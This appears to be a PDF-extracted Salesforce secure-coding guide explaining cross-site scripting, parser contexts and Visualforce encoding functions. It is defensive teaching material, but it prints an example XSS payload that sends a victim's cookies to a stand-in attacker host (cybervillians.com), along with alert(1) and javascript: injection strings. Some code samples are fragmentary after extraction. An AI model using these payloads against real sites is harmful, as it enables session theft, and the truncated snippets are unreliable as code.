secure_coding
secure_coding
names and marks. Other marks appearing herein may be trademarks of their respective owners.
CONTENTS
This guide walks you through the most common security issues Salesforce has identified while auditing
applications built on or integrated with the Lightning Platform.
This guide takes into account that many of our developers write integration pieces with the Lightning
Platform and includes examples from other web platforms such as Java, ASP.NET, PHP and Ruby on Rails.
The Lightning Platform provides full or partial protection against many of these issues. It is noted when
this is the case.
Consider this to be an easy to read reference and not a thorough documentation of all web application
security flaws. More details on a broader spectrum of web application security problems can be found
on the OWASP (Open Web Application Security Project) site.
1
CHAPTER 2 Considerations for Flow Design
Plan for these considerations to securely design, implement, and manage flows.
Use Subflows
Split the flows into subflows to modularise your flows and control the execution context of specific parts
of the process. Using subflows allows a main flow to run in a User Mode while placing the privileged
operations in subflows and running them in System Mode. For example, a flow that creates a new
opportunity can run in User Mode, and the subflow that assigns ownership based on complex rules can
run in System Mode with sharing enabled.
Dividing flows into privileged and unprivileged portions is recommended.
• Unprivileged portions run in User mode.
• Privileged portions run in System Mode and can be placed into subflows.
For example, for flows that insert leads, to avoid duplications in lead insertion, place the code that
searches for all leads to detect duplicates in a privileged subflow, while the flow that inserts the leads
runs in User Mode
Note: Explicitly setting the execution context is recommended. The execution context is
determined by the advanced 'run in mode' settings that are controlled by the flow author and by
how the flow is invoked. If invoked from an Apex class, the flow always runs in System Mode
Without Sharing, irrespective of the flow settings. In any other case, the process follows the
configured flow settings.
2
Considerations for Flow Design
3
CHAPTER 3 Secure Coding Cross Site Scripting
Cross-site scripting (XSS) is a prevalent security threat where attackers inject malicious scripts into web
pages, potentially leading to data theft, session hijacking, and altered website content. This topic will
cover how XSS attacks work and how to protect against them.
What is it?
Cross-site scripting is a vulnerability that occurs when an attacker can insert unauthorized JavaScript,
VBScript, HTML, or other active content into a web page viewed by other users. A malicious script inserted
into a page in this manner can hijack the user’s session, submit unauthorized transactions as the user,
steal confidential information, or simply deface the page. Cross-site scripting is one of the most serious
and most common attacks against web applications today.
XSS allows malicious users to control the content and code on your site — something only you should
be able to do!!
Sample vulnerability
Consider a web application with a search feature. The user sends their query as a GET parameter, and
the page displays the parameter in the page:
Request: https://example.com/api/search?q=apples
Response: “You searched for apples”
For example, this could be done with the following Visualforce page:
<apex:page>
<!-- Vulnerable Page at https://example.com/api/search -->
<div id='greet'></div>
<script>
document.querySelector('#greet').innerHTML='You searched for
<b>{!$CurrentPage.parameters.q}</b>';
</script>
</apex:page>
An XSS attack could take place if the user were visiting another site that included the following code:
<html>
<!-- Evil Page -->
<body>
<h1>Ten Ways to Pay Down Your Mortgage</h1>
<iframe id='attack' style='visibility:hidden'>
<script>
var payload = "\x3csvg
onload=\x27document.location.href=\x22http://cybervillians.com?session=\x22+document.cookie\x27\x3e";
document.querySelector('#attack').src =
"https://example.com/api/search?q=" +
4
Secure Coding Cross Site Scripting
encodeURIComponent(payload);
</script>
</body>
</html>
</script>
</html>
The victim’s browser will parse this response and render the following example.com DOM:
<div id='greet'>
You searched for
<b>
<svg
onload='document.location.href="http://cybervillians.com?session=" +
document.cookie'>
</b>
</div>
Once the DOM is rendered, the browser will navigate the page to cybervillians.com and will also send
the user's examle.com cookies there. It will be as if example.com developers had written their page that
way. However, there is essentially no limit to the payloads the attacker could have provided. Anything
example.com developers can do with HTML and JavaScript, the attacker can also do.
5
Secure Coding Cross Site Scripting
<b>"{!$CurrentPage.parameters.q}"</b>';
</script>
For example, by setting the URL parameter to be q='; ....attacker code here..;//'
Finally, the Javascript parser invokes an innerHTML write, passing a string back to the HTML parser
for DOM rendering. Here the attacker can inject another payload containing an HTML tag with a
javascript event handler. Because the string passed to innerHTML is defined in a Javascript context,
the control characters do not need to be < or >, but can be represented as '\x3x' and '\x3e'. These
will be interpreted by the Javascript engine as brackets to be written into the DOM. This is the original
sample attack.
Therefore the sample code has three different parsing stages which allow for three different attacks,
triggered by the insertion of three different control characters:
– > can be used to break out of the original script block
– ' can be used to break out of the javascript string declaration
– \x3c or \u003c or < can be used to inject a new tag via innerHTML.
Other constructions have other parsing stages and potential attacks -- the list of potentially dangerous
characters is dependent on the sequence of parsers applied to user data.
Rather than trying to learn all possible dangerous characters, the developer should learn to identify
the sequence of browser parsing passes and apply the corresponding sequence of escaping functions.
This will ensure that user data renders properly as text and cannot escape into an execution context.
Only attribute values and the textvalue of a node are considered data for the HTML parser. All other
tokens are considered markup.
There are two main mechanisms of injecting javascript into HTML:
<div>[userinput]</div> <!-- userinput = <script>alert(1)</script>
-->
<div>[userinput]</div> <!-- userinput = <svg onload='payload'> -->
<div title='[userinput]'> <!-- userinput = ' onmouseover='payload'
' -->
6
Secure Coding Cross Site Scripting
– Directly as a script tag or other HTML tag that supports a javascript event handler
– Breaking out of an html tag and creating another html tag that is a javascript event handler
Because of this, user input within an html context needs to be prevented from breaking out of a
quoted context or from injecting html tags. This is done with HTML encoding.
HTML Encoding
In order to force a string character to be interpreted as data rather than markup, a character reference
should be used. There are two common ways to denote a character reference:
– numeric character references represent the character by an ampersand (&), the pound sign (#)
followed by either the decimal unicode point value, or an "x" and the hexadecimal unicode
value. Finally, a semicolon (;) closes out the character reference. This allows every unicode
character to be referenced.
– entity character references represent a subset of commonly used special characters by an
ampersand (&) an ascii mnemonic for the character's name, and an (optional) closing semicolon.
HTML Encoding is the process of replacing characters by their character references and HTML
decoding is the reverse.
<html>
<body>
<div id="link1">
<a href="www.salesforce.com">link</a> <!-- Not interpreted
as a tag but as text-->
</div>
<div id="link2">
<a href="www.salesforce.com">link</a> <!-- Not interpreted
as an anchor tag -->
</div>
<div id="link3">
<a href="www.salesforce.com">link</a> <!-- link without
anchor-->
</div>
<div id="link4">
<a
href="www.salesforce.com">link</a>
<!-- works fine. -->
</div>
</body>
</html>
7
Secure Coding Cross Site Scripting
<a href=”www.salesforce.com”>link</a>
</div>
</body>
– For link1, because the bracket is replaced by its character reference, the less than sign is treated
as a string literal. The closing tag </a> is viewed as a redundant closing tag and is not rendered
in the DOM at all.
– In link2, an escaped character immediately follows the opening tag, but the HTML Parser is
expecting a tagname which is markup, as this is impossible the HTML parser bails on tag
processing and interprets the opening tag as text. The closing tag is swallowed as in link1.
– In link3, the anchor tag is successfully parsed but as the "h" in "href" is escaped, the href is not
interpreted as an attribute and the result is an anchor tag without an href, the link text appears
but is not clickable.
– In link4, because a portion of an attribute value is encoded, the character references are decoded
to "www.sales" in the DOM and the link is clickable, successfully navigating to www.salesforce.com
Therefore if developers html encode user data prior to HTML rendering, the data will always render
as text and never as markup. In general, only a subset of characters are html encoded: those characters
that can allow an attacker to inject their own tags or break out of a quoted attribute value:
When using unquoted attribute values or when failing to close tags other characters need to be
escaped. However in this case the set of characters that would need to be escaped are browser
dependent and may change with new browser versions. Developers should ensure that all HTML
tags are balanced and that all attribute values are quoted. User data within an HTML context should
only appear as the text content of an existing tag or within a quoted attribute value.
8
Secure Coding Cross Site Scripting
<script>
console.log('in alpha</script><script>console.log("not in
alpha");</script>');
</script>
</body>
</html>
Another example:
<html>
<head>
</head>
<body>
9
Secure Coding Cross Site Scripting
<div id='xyz'
onclick='console.log("decoded")'>Click
me!</div>
<div id='baa'>Click me!</div>
<div id='baz'>Click me!</div>
<script>
document.querySelector('#baa').onclick = function() {
console.log("decoded");
return true;
}
document.querySelector('#baz').onclick = function() {
console.log("Howdy!</script><script>alert(1)</script>");
return true;
}
</script>
</body>
</html>
Clicking on the first div logs decoded, whereas clicking on the second logs
decoded and clicking on the third div pops an alert box.
CDATA-style processing presents a number of potential pitfalls:
– Refactoring issues: If a developer first defines the event handler inline and then re-factors to
register event handlers within a script tag, she will need to ensure that one fewer HTML-encode
operation occurs, otherwise data will be over encoded. Similarly, a refactoring away from separate
registration towards inline definition can lead to under-encoding. In both cases, the resulting
page is broken, however alphanumeric characters will continue to render properly even as a "<"
will be rendered as "<" or interpreted as markup in the over or under-encoding cases.
– JS string escapes: As per the example, if an attacker can inject brackets into a javascript string
context, they may be able to break out of the string by breaking out of the parent script context
entirely. This effectively makes brackets javascript control characters.
– Complex parsing rules with comments: The combination of html-style comment tags with
<script> or <style> tags can lead to confusing or unexpected behavior. We will not detail these
parsing rules here, but developers should not nest <script> tags within each other or place html
comments <!-- on the same line as <script> tags.
Escapable Raw Text Parsing
For <textarea> and <title> tags, escapable raw text parsing is used. Here the parser looks for the
closing <textarea> or <title> tag and does not allow the creation of any new tags. Nevertheless,
character references are decoded.
In this context keep the following in mind:
– Do not assume that user data cannot break out of this context -- data can break out by closing
the title or textarea tag.
– When using this context to store HTML micro templates, do not allow user input to write to this
context without HTML encoding
• Javascript Parser
10
Secure Coding Cross Site Scripting
A Javascript Parser tokenizes javascript code for execution by the browser's javascript engine. Javascript
code can generate new HTML code (e.g. document.write() element.innerHTML=x) and can also skip
the HTML Parser and update the DOM directly (e.g.document.createElement(), element.title=x,
document.body.appendChild()). Javascript code can also update element styles via the CSS Object
Model (CSSOM).
Javascript has several encoding formats:
– C-style backslash \ encoding of special terminal characters and string literals
– 2 byte hex encoding of the corresponding ASCII code point: \xNN
– 3 digit octal encoding of the corresponding code point \NNN
– 4 byte hex encoding of a 4 byte UTF-16 plane: \uNNNN. Surrogate pairs are handled by placing
the 4 byte references next to each other \uAAAA\uBBBB
The following table shows the typical behavior of a javascript encoder:
Backslash \ \\
Javascript encoding is not nearly as powerful as HTML encoding. Object names (variables, functions,
arrays) can be encoded in Javascript and still be callable, so merely encoding something does not
mark it as data rather than code. Instead, Javascript encoding is used to prevent user data from
breaking out of a quoted string context, by escaping the characters that would close out a string
(single and double quotes, as well as new lines). Additionally, because of CDATA parsing, a closing
script tag can also break out of a string (by breaking out of the enclosing script).
Note that if user controlled data is placed into a javascript context without being quoted, then
nothing can prevent XSS. All user data in javascript should be quoted AND encoded.
Be aware that Javascript decoding occurs in Javascript when strings are evalued as code such as
with eval, setInterval, or Function, in which case you will need to additionally JS encode user data
for each implicit eval performed. Because of this it is recommended that you do not apply evals on
code containing user data.
Javascript can invoke the HTML parser by means of one of built in HTML rendering methods:
document.writeln
element.innerHTML
11
Secure Coding Cross Site Scripting
element.insertAdjacentHTML
If you are using jquery, the following are common DOM manipulation methods that invoke the
HTML parser in their implementation. c.f. Dom XSS Wiki
.append()
.before()
.after()
.html()
.prepend()
.replaceWith()
.wrap()
.wrapAll()
If you are using a different toolkit or higher order javascript framework, you will need to know whether
the methods you call invoke the HTML decoder or not, otherwise you risk over or under-encoding
data.
<html>
<head>
<script src='/jquery.js'>
</head>
<body>
<div id='xyz'></div>
<script>
//payload
var payload = "<svg onload='alert(1)'>";
var html_encoded_payload = "<svg
onload='alert(1)'>";
var el = document.querySelectorAll('#xyz');
el.append = payload; //vulnerable
el.append = html_encoded_payload; //safe and correct
el.innerText = payload; //safe
el.innerText = html_encoded_payload; //safe but double encoded
12
Secure Coding Cross Site Scripting
$('#xyz').append(payload); //vulnerable
$('#xyz').append(html_encoded_payload); //safe and correct
$('#xyz').text(payload); //safe
$('#xyz').text(html_encoded_payload); //safe but double
encoded
</script>
</body>
</html>
• URI Parser
The URI parser tokenizes URIs into the following components:
scheme://login.password@address:port/path?query_string#fragment
Control characters for the URI parser are the full ascii scheme name, scheme delimiter ":", ".", "?", "/",
and "#". Data for the URI parser are the two credentials, the address, path, query string and fragment
content.
In those cases when, for example a path needs to contain a question mark that should not be
interpreted as a control character, then URI Encoding is used: %3f. URI encoding is defined in RFC
3986 and consists of a % sign followed by the two byte hexadecimal extended ascii number.
For security encoding, be aware that browsers support multiple pseudo-schemes, the most important
of which is the javascript pseudo scheme: javascript:..payload..
If the scheme or scheme delimeter (:) is URI encoded, it will not be interpreted as a scheme. Similarly,
if a "/" is URI encoded, it will not be interpreted as a path delimiter. Therefore URI encoding an a
string and setting it to be an href will cause the browser to interpret the entire string as a relative
path with no URL parameters and no fragments.
<html>
<body>
<a id='xyz'>Click me!</a>
<script>
var el = document.querySelector('#xyz');
el.href='javascript:alert(1)' //executes
el.href='javascript:\x61lert(1)' //js encode 'a' in alert.
executes
el.href='javascript\x3aalert(1)' //js encode ':' in scheme.
executes.
el.href='javascript%3aalert(1)' //URI encode ':' in scheme.
does not execute
el.href="javascript:alert(1)"; //does not execute
el.outerHTML = '\x3ca
href=\x22javascript:alert(1)\x22\x3eClick me!\x3c/a\x3e';
//executes
</script>
</body>
</html>
13
Secure Coding Cross Site Scripting
Because URI encoding maps characters to %XX, which are not HTML, JS, or CSS control characters,
we can skip any additional encodings that would need to occur after URI encoding, but we cannot
skip encodings that are required before URI encoding:
<html>
<body>
<!-- Vulnerable to XSS -->
<a id='xyz'>Click me!</a>
<a id='abc'>Click me!</a>
<script>
var xyz = document.querySelector('#xyz');
var payload = "javascript:alert(1)";
xyz.href="javascript:\x22this.element.innerHTML=\x22" +
payload + "\x22"; //vulnerable
</script>
</body>
</html>
In the above, payload will be sent to a URI parser (in the href definition) and then to the HTML parser.
Therefore to properly encode the payload requires both decodings:
URIENCODE(HTMLENCODE(payload)).
If, for example, the payload is only HTMLENCODED, then %3c will be URI decoded into a bracket. If
the payload is only URIENCODED, then a payload of "<" can be injected directly.
As URI Encoding is only defined on ASCI codes 0-255, when higher order code points need to be
encoded, they are first transformed into a sequence of UTF-8 bytes and then each byte is URI Encoded.
Be aware that javascript contains three built in URI encoding and decoding functions, none of which
are suitable for security encoding:
– escape(), unescape() have been deprecated because of improper UTF-8 handling.
– encodeURI() and decodeURI() are designed to allow URIs with some illegal characters to be
converted to legal URIs. These functions do not encode URI control characters such as "://" or
".".
– encodeURIComponent() and decodeURIComponent() are designed to encode all URI control
characters but do not encode all characters such as the single quote.
For guidance as to which functions to use, see the specific section guidance.
• CSS Parser
CSS parsers have their own encoding format as specified in ISO 10646. CSS encoding consists of a
backslash followed by up to 6 hexadecimal digits corresponding to the unicode code point. As the
number of digits is variable, a trailing space is required to close out the character reference if less
than 6 digits are used, and in this case the space is consumed by the CSS parser.
As with Javascript encoding, merely encoding a string does not force the CSS parser to treat it as
data rather than markup -- the encoding is only useful to prevent user data from breaking out of a
quoted string declaration. Unfortunately, many CSS property values are not quoted, in which case
it is impossible to safely encode the value. In this case, strict use of an allowlist (which provides a list
of allowed values and prevents the use of anything unlisted) is required to ensure that only the
expected characters are present in the string.
14
Secure Coding Cross Site Scripting
There are several ways that the CSS parser can invoke the URI parser (for example by referencing an
image URL or a style sheet URL), but invocation of javascript from CSS is limited to browser specific
features such as moz-bindings or older browser features (such as expression or javascript
pseudo-schemes). Nevertheless, as Salesforce supports these older browsers, it's critical to use an
allowlist—a list of all acceptable values— on user data whenever it is passed to the CSS interpreter.
When CSS is invoked from javascript, for example with element.style="x", it is first interpreted by the
javascript parser and then by the CSS parser. In such cases, javascript control characters should be
escaped. If they aren't, they could be used to bypass the allowlist filter. For this reason, filtering
against the allowlist should be done as close to the sink as possible.
General References
• – Coverity Static Analysis
– OWASP XSS Portal
– HTML5 Security Cheet Sheet
– OWASP XSS Test Guide
– Browser Internals and Parsing
– Browser Security Handbook
– Browser Parsing and XSS review of different frameworks
Specific Guidance
Apex and Visualforce Applications
The platform provides two main mechanisms to avoid cross site scripting: auto HTML encoding as well
as built in encoding functions that can be invoked manually from VisualForce. Nevertheless in order to
use these protections correctly, the developer needs to have a thorough understanding of how user
controlled variables are rendered by the browser.
There is no 'easy' button with cross site scripting defenses. Developers must understand the sequence
of rendering contexts into which they place user data, and encode appropriately for each context.
Built in Auto Encoding
All merge-fields are always auto HTML encoded provided they
• do not occur within a <style> or <script> tag
• do not occur within an apex tag with the escape='false' attribute
The auto HTML encoding performed is applied last (after any other VisualForce functions) and is applied
regardless of whether you use any other VisualForce encoding functions. It does not matter whether
the merge-field is rendered via an explicit apex tag or directly using the braces notation within HTML
markup. Your application code needs to take auto-encoding into account in order to avoid double
encoding or improperly encoding merge-fields.
For example, the value of the userInput parameter will be HTML encoded in the following:
<apex:outputText>
{!$CurrentPage.parameters.userInput} <!-- safe (auto HTML Encoded)
15
Secure Coding Cross Site Scripting
-->
</apex:outputText>
or here
<div>
{!$CurrentPage.parameters.userInput} <!--safe (auto HTML Encoded)
-->
</div>
}
</style>
The auto encoding only provides HTML Encoding of <, > and quotes within html attributes. You must
perform your own Javascript and URL encoding as well as handle CSS cross site scripting issues.
Auto-HTML encoding is not sufficient when passing through multiple parsing contexts:
<!--vulnerable to XSS -->
<div onclick =
"console.log('{!$CurrentPage.parameters.userInput}')">Click me!</div>
In the above code fragment, userInput is rendered with a Javascript execution context embedded
with an HTML context, and so the auto-HTML encoding is insufficient. For these and other uses cases,
the platform provides VisualForce encoding functions that can be chained together to provide sufficient
encoding in multiple contexts.
Unsafe sObject Data Types
sObjects can be built from a number of primitive data types. When rendering a merge-field or retrieving
a field via the API, it's important to understand whether the field contains potentially unsafe or safe
content. The following primitive data types can contain unsafe strings:
picklist Can contain arbitrary text, independent of the field definition. Picklist
values are not enforced by the schema, and users can modify a picklist
value to contain any text via an update call.
16
Secure Coding Cross Site Scripting
Name fields can be arbitrary text, and must be considered unsafe. This also applies to global variables
such usernames.
Developers are urged to program defensively. Even if a primitive type (such as an Id) cannot contain
control characters, properly output encode the field type based on the rendering context. Output
encoding will never result in over encoding and will make your application safe for further refactoring
should the controller logic change -- for example, by pulling the Id from a URL parameter rather than
from the controller.
Built in VisualForce encoding functions
The platform provides the following VisualForce encoding functions:
• JSENCODE -- performs string encoding within a Javascript String context.
• HTMLENCODE -- encodes all characters with the appropriate HTML character references so as to
avoid interpretation of characters as markup.
• URLENCODE -- performs URI encoding (% style encoding) within a URL component context.
• JSINHTMLENCODE -- a convenience method that is equivalent to the composition of
HTMLENCODE(JSENCODE(x))
Data may need to be encoded multiple times if it passes through multiple parsers.
JSENCODE
JSENCODE is used to prevent user data from breaking out of a quoted string context:
<script>
var x = '{!JSENCODE($CurrentPage.parameters.userInput)}'; //safe
</script>
If the data was not quoted, the user could insert their own code directly into the script tag. If the user
was quoted but not JSENCODED, an attacker could break out of the quotes by including a single quote
in the URL parameter:
userInput='; alert(1); //
Because the parsing flow is HTML Parser -> JS Parser, the mergefield must be properly encoded as:
HTMLENCODE(JSENCODE(x)). As we know that the platform will HTML auto-encode last, it is enough to
explicitly invoke the inner encoding, JSENCODE.
17
Secure Coding Cross Site Scripting
What is the merge-field is not typed as a string? One option is to leave the merge-field naked. However
this is a dangerous anti-pattern because it creates a dependency between the implementation details
in the controller and the security of the visualforce page. Suppose, for example, that in the future, the
controller pulls this value from a URL parameter or textfield. Now the visualforce page is vulnerable to
cross site scripting. The security of the visualforce page should be decoupled as much as possible from
the controller implementation.
Therefore we recommend defensive programming -- cast to the appropriate type explicitly using the
built in constructors:
<script>
var myint = parseInt("{!JSENCODE(int_data)}"); //now we are sure
that x is an int
var myfloat = parseFloat("{!JSENCODE(float_data)}"); //now we are
sure that y is a float
var mybool = {!IF(bool_data, "true", "false")}; //now we are sure
that mybool is a boolean
var myJSON = JSON.parse("{!JSENCODE(stringified_value)}"); //when
transmitting stringified JSON
</script>
This way a subtle change in the controller implementation (for example, pulling the value from a URL
parameter or text field) will not trigger a security vulnerability in the corresponding VisualForce page.
HTMLENCODE
HTMLENCODE is required when userdata is interpreted in an HTML Context and is not already
auto-encoded.
For example:
<apex:outputText escape="false" value="<i>Hello
{!HTMLENCODE(Account.Name)}</i>" />
In the above, because Name fields can be arbitrary text strings, any rendering of this field needs to be
properly output encoded. Because we want to combine markup (italics) with data, the apex tag is set
to escape="false" and we manually encode user data.
As always, one layer of encoding needs to be applied for each layer of parsing:
<div id="xyz"></div>
<script>
document.querySelector('#xyz').innerHTML='Howdy ' +
'{!JSENCODE(HTMLENCODE(Account.Name))}';
</script>
In the above, the merge-field first passes through the HTML Parser when the page is loaded, but because
the merge-field is within a script tag, the HTML parser does not perform character reference substitution
and instead passes the contents of the script block to the javascript parser. Javascript code then calls
innerHTML which performs HTML parsing (and character reference substitution). Therefore the parsing
is Javascript -> HTML, and the necessary encoding is JSENCODE(HTMLENCODE()). Note that only
performing JSENCODE or only performing HTMLENCODE will lead to a broken page and possibly a cross
site scripting vulnerability.
18
Secure Coding Cross Site Scripting
Here, the merge-field is sent through the HTML parser when the page is loaded. Because it is not in a
script or style tag, character reference substitution occurs, and the result is then sent to the Javascript
decoder (in the definition of the onclick event handler). Once clicked, the result will be sent back to the
HTML parser for innerHTML rendering. Therefore there are three layers of decoding: HTML -> Javascript
-> HTML, and as a result, three layers of encoding need to be applied. However HTML auto encoding
will be automatically applied at the outer layer, so the developer needs to only apply
JSENCODE(HTMLENCODE()):
<!-- safe -->
<div onclick="this.innerHTML='Howdy
{!JSENCODE(HTMLENCODE(Account.Name))}'">Click me!</div>
Here, the merge-field is first parsed by the HTML parser when the page is loaded, is then passed to the
Javascript parser in the definition of the on-click handler, is passed again to the HTML parser when the
onclick handler is invoked, and is finally passed to the Javacript parser when the element is clicked a
second time. Therefore the merge-field needs to be encoded as follows:
HTMLENCODE(JSENCODE(HTMLENCODE(JSENCODE()))). Because auto-encoding takes care of the outer
HTMLENCODE, the code fragment can be properly sanitized as follows:
<!-- safe -->
<div onclick="this.innerHTML='\x3cdiv
onclick=\x22console.log(\x27Howdy
{!JSENCODE(HTMLENCODE(JSENCODE(Account.Name)))}\x27);\x22\x3eClick
me again!\x3c/div\x3e'">Click me!</div>
URLENCODE
URLENCODING maps each character with ascii code 00-255 to the corresponding two byte hex
representation as %XX. Therefore URLENCODING will not provide valid absolute URLs and should only
be used when encoding URI components:
<!-- Safe -->
<img src="/xyz?name={!URLENCODE(Pic.name)}">{!Pic.Name}</img>
(Note that in the above fragment, Pic.Name within the text content of the image tag does not need to
be encoded because it will be auto HTML encoded). Because URLENCODING has such a restricted
character output, there is no need to do any additional encoding once URLEncoding is applied, as %XX
is not a valid control character for any of the other parsing contexts. Therefore the following is safe and
does not need any JSENCODING or HTMLENCODING:
<script>
<!-- Safe, but anti-pattern -->
var x = '{!URLENCODE(Pic.name)}';
19
Secure Coding Cross Site Scripting
var el = document.querySelector('#xyz');
el.outerHTML = '<img src = "/pics?name=' + x + '">';
</script>
Nevertheless, even though the above code is safe, it is recommended that you minimize use of HTML
rendering as much as possible:
<script>
<!-- Safe, and no use of HTML rendering -->
var x = '{!URLENCODE(Pic.name)}';
var el = document.querySelector('#xyz');
el.src = '/pics?name=' + x;
</script>
One thing to keep in mind about URLs is that all browsers will accept a javascript pseudo-scheme for
location URLs while older browsers will also accept a javascript pseudo-scheme for src attributes or url
attributes within CSS. Therefore you must control the scheme as well as the host and only allow user
input to set URL parameters or paths. In those cases when users select the host, you must create an
allowlistof acceptable hosts and validate against it to avoid arbitrary redirect vulnerabilities.
JSINHTMLENCODE
JSINHTMLENCODE is a legacy VisualForce function that was introduced when the platform did not always
auto HTML encode merge-fields. JSINHTMLENCODE is effectively a combination of
HTMLENCODE(JSENCODE()), so before the introduction of auto-HTML encoding, developers would need
to call this function when including merge-fields in javascript event handlers within HTML. Now that
the platform auto-HTML encodes, it is sufficient to call JSENCODE() in this case.
<!-- safe, but broken due to double html encoding -->
<div onclick="console.log('{!JSINHTMLENCODE(Account.Name)}')">Click
me!</div>
However, because the set of control characters for HTML and Javascript is almost disjoint, calling
JSINHTMLENCODE can still be used as a replacement for JSENCODE(HTMLENCODE(x)), and can therefore
save one function call in visualforce:
<script>
var el = document.querySelector('#xyz');
el.innerHTML = "Howdy {!JSINHTMLENCODE(Account.Name)}"; //safe and
accurate
</script>
XSS in CSS
Cascading Style Sheets is an increasingly complex language that is only slowly becoming standardized
across browsers. All modern browsers do not allow javascript injection within CSS attribute values,
however this is not true for older browsers. Unfortunately it is not sufficient to cast CSS attribute values
to strings and then encode the values because many CSS properties are not rendered as strings.
<style>
<!-- vulnerable to XSS unless verified with an allowlist in the
20
Secure Coding Cross Site Scripting
controller-->
foo {
color: #{!color};
}
<style>
As a result, do not place any merge-fields within a <style> tag unless they are on an allowlist (a list of
acceptable fields, unlisted fields are not allowed) in the controller. Alternatively, first pass the variables
to a javascript context, validate them in javascript, and then use CSSOM or a js toolkit to update the style
programmatically:
<script>
var el = document.querySelector('#xyz');
var color = '{!JSENCODE(color)}'; //must JSENCODE to prevent
breakint out of string
if ( /(^[0-9a-f]{6}$)|(^[0-9a-f]{3}$)/i.test(color) ) {
el.style.color='#' + color; //safe to render into a style context
}
<script>
Here if xyz__c is built from one of the dangerous sObject types such as text, passing it to an html
rendering function creates a vulnerability. In this case, the developer has two options:
• Use a safe DOM manipulation function such as innerText, rather than innerHTML.
• Properly encode the data in javascript prior to the innerHTML write
The first option is preferred, but may sometimes be impractical (for example when you are using a higher
level toolkit that performs innerHTML writes in the method you are using.) In this case you must use a
javascript encoding library.
Javascript Security Encoding Libraries
Although Salesforce does not currently export javascript security encoding methods, there are a number
of third party security libraries that you can use.
We recommend the Go Instant secure-filters library because it has been vetted by the Salesforce security
team and is small and easy to use. It is also available as a node package. To use this library, place the
21
Secure Coding Cross Site Scripting
secure-filters.js file in your static resources. The library will export a secureFilters object which has a
number of encoding methods:
<apex:page controller="Xyz">
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<div id="result">result</div>
<script type="text/javascript">
//
//convenience methods
//
// applies HTMLENCODE(CSS ENCODE)
var style_encode = secureFilters.style;
//Example usage
Visualforce.remoting.Manager.invokeAction(
'{!$RemoteAction.Xyz.getName}',
function(result, event){
if (event.status) {
//requires html encoding
$("#xyz").append(html_encode(result));
$("#xyz").append(
//requires html(js(encoding))
"<div id='abc'" + onclick='console.log('" +
js_attr_encode(result) + "');>Click me</div>"
);
$("#abc").onmouseover = function() {
//do not encode here
console.log('You moused over ' + result);
};
22
Secure Coding Cross Site Scripting
);
} else {
//don't forget to encode messages in error conditions!
$("#responseErrors").html(
html_encode(event.message)
);
}
},
{escape: false}
);
</script>
</apex:page>
Notice that when generating the logs, in one case the sample code applied html(js(result))
encoding needs to be applied while in another, no encoding needs to be applied even though the code
is trying to do the same thing: create an event handler that logs a user controlled string to the console.
This is because in the first case, user data is serialized into a string which is passed to the HTML parser,
which, when parsed includes an attribute value definition -- serialized into another string -- that is passed
to the JS parser. Therefore two layers of encoding are needed.
In the second case, the event handler was defined directly in javascript as a function and assigned to a
DOM property. Because no string serialization or de-serialization occured, no client-side encoding was
required.
Avoiding Serialization
As each round of serialization and de-serialization creates a need for encoding, avoid serialization
whenever possible by using innerText rather than innerHTML, setAttribute rather than
string concatenation, and by defining event handlers directly in javascript rather than inline within the
html tag.
<script>
var payload = '{!JSENCODE($CurrentPage.parameters.xyz)}';
23
Secure Coding Cross Site Scripting
$("#xyz").append(el);
</script>
If you are using a higher level API (such as the REST Toolkit or Mobile Toolkit), please examine the
documentation to determine what the encoding policies are, or examine the code to determine which
low level APIs are being invoked. For example, the ForceTk client uses the REST API, and therefore all
data is passed back raw:
<script>
var client = new forcetk.Client();
client.setSessionToken('{!$Api.Session_ID}');
client.query("SELECT Name FROM Account LIMIT 1", function(response){
$j('#accountname').html(response.records[0].Name); //vulnerable to
XSS
});
</script>
24
Secure Coding Cross Site Scripting
through data pulled from any other remote source (e.g. window.postMessage, xhr calls, and jsonp).
Finally, taint sources can propage through other DOM properties:
<apex:page>
<apex:includeScript value="{!$Resource.SecureFilters}"/>
<script>
//safe because no HTML rendering occurs
document.querySelector('#section1').innertext =
document.querySelector('#heading').innerText;
secureFilters.html(document.querySelector('#section1').innerText);
</apex:page>
The Dom XSS Wiki contains a detailed list of sinks, sources and sample code.
Javascript Micro Templates
Developers wanting to move more presentational logic to the client often make use of javascript
templating languages to handle html generation.
There are a large number of javascript micro-templating frameworks, roughly falling into two categories:
• logic-less frameworks such as mustache.js have their own domain specific language for iteration
and and logical operations.
• embedded javascript frameworks such as underscore_js’s _template function use javascript to
perform iteration and logical operations with client-side merge-fields, obviating the need to learn
a DSL.
Nevertheless, none of the encoding or security concerns go away with these frameworks -- developers
still need to be mindful of the type of data that is passed into the framework and the ultimate context
in which the data will be rendered in order to properly output encode all variables, but additionally they
need to study the built in encoding options offered by the framework. Generally all frameworks have
support for some kind of html encoding, but the developer should verify that this includes escaping of
single and double quotes for rendering within html attributes.
For rendering URLs, Javascript, or CSS, the developer is on their own and must either not render user-data
in these contexts or use a third party security library to properly escape output in all contexts other than
pure html.
25
Secure Coding Cross Site Scripting
One concern to keep in mind is that sometimes template data is stored in textarea tags with visibility
set to hidden. In this case, be aware that HTML rendering occurs when data is sent to a textarea field.
Finally, never place merge-fields into template data, as templates are invoked with eval(). Rather, define
use merge-fields to define variables outside of your template and then pass the variable reference to
the template.
Underscore Templates
All templates use innerHTML style rendering and so developers must ensure that template variables are
encoded. Underscore templates allow for auto-HTML encoding with the <%- %>. No HTML encoding
is done with <%= %>, which should in general be avoided. However, HTML encoding is generally
insufficient so these templates cannot be securely used for templating unless you include additional
client side encoding functions. The following example shows how to secure an underscore_js tempalate
using the secure-filters library.
<apex:page >
<!-- vulnerable code -->
<apex:IncludeScript value="{!$Resource.jquery}"/>
<apex:IncludeScript value="{!$Resource.underscore}"/>
<apex:IncludeScript value="{!$Resource.Securefilters}"/>
<apex:includeScript value="{!URLFOR($Resource.forcetk')}"/>
<div id='mainContainer'>content</div>
<script>
26
Secure Coding Cross Site Scripting
client.setSessionToken('{!$Api.Session_ID}');
$(document).ready(function() {
//tell client to wait a bit here..
function render(name) {
var record = {
Id: "click me!",
Name: name //for 2: \x22); alert(1); //
};
$('#mainContainer').empty();
$('#mainContainer').append(compiled1(record)); //pops
$('#mainContainer').append(compiled2(record)); //does not
pop
$('#mainContainer').append(compiled3(record)); //pops
$('#mainContainer').append(compiled4(record)); //does not
pop
}
</script>
</apex:page>
27
Secure Coding Cross Site Scripting
